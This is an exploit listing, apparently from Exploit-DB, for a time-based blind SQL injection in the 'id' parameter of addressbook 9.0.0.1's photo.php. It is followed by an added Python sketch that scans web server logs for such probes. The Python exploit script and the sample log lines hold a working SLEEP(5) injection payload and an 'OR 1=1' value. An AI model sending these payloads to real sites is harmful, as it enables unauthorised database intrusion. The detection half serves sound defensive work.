addressbook 9.0.0.1 – ‘id’ SQL Injection

  • Author: David Velazquez
    Date: 2020-05-04
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/48416/
  • # Title: addressbook 9.0.0.1 - 'id' SQL Injection 
    # Date: 2020-04-01
    # Author: David Velazquez a.k.a. d4sh&r000
    # vulnerable application:https://sourceforge.net/projects/php-addressbook/files/latest/download
    # vulnerable version: 9.0.0.1
    # Description: addressbook 9.0.0.1 time-based blind SQL injection
    # Tested On: Ubuntu Server 20.04 LTS
    # Platform: PHP
    # Type: webapp
    
    # Use:
    # addressbook9-SQLi.py #http://127.0.0.1/photo.php?id=1'
    
    
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    
    import sys
    import requests
    
    def isVulnerable(URL):
        """Check if the URL is vulnerable to time-based blind SQL injection"""
        # Append a SLEEP(5) condition to the id value and time the response
        response = requests.get(URL+'%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy')
        s = response.elapsed.total_seconds()
        if s > 5:  # I put a sleep sentence to test the bug
            sys.stdout.write('[+] Application is vulnerable!!!\n')
        else:
            sys.stdout.write('[+] Application NOT vulnerable\n')
    
    if __name__ == "__main__":
        isVulnerable(sys.argv[1])
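
On the defensive side, the probe above leaves a recognizable trace in web server access logs. The following detection sketch is an added example, not part of the original exploit or of the addressbook project; it assumes Apache combined log format and that legitimate `id` values for `photo.php` are plain integers, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/May/2020:10:00:01 +0000] "GET /photo.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/May/2020:10:00:05 +0000] "GET /photo.php?id=1%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy HTTP/1.1" 200 5120 "-" "python-requests/2.23.0"',
    '203.0.113.7 - - [04/May/2020:10:00:09 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/May/2020:10:00:12 +0000] "GET /photo.php?id=2%20OR%201=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Delay primitives used by time-based probes on common SQL back ends.
DELAY_RE = re.compile(r'\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b', re.I)
NUMERIC_RE = re.compile(r'[0-9]+')


def classify(line):
    """Return (client, verdict) for a photo.php request, or None for other lines."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.endswith('/photo.php'):
        return None
    # parse_qs percent-decodes the value, so %27 and %20 become ' and space.
    values = parse_qs(parts.query, keep_blank_values=True).get('id', [])
    if all(NUMERIC_RE.fullmatch(v) for v in values):
        return client, 'ok'
    if any(DELAY_RE.search(v) for v in values):
        return client, 'time-based-sqli'
    return client, 'non-numeric-id'  # assumption: valid ids are integers


def scan(lines):
    """Return (client, verdict) for every photo.php request that is not 'ok'."""
    hits = []
    for line in lines:
        result = classify(line)
        if result and result[1] != 'ok':
            hits.append(result)
    return hits


if __name__ == '__main__':
    for client, verdict in scan(SAMPLE_LOG):
        print(f'{client}\t{verdict}')
```

Access logs record only GET query strings, so the same parameter sent in a POST body needs the check applied at the application or WAF layer instead.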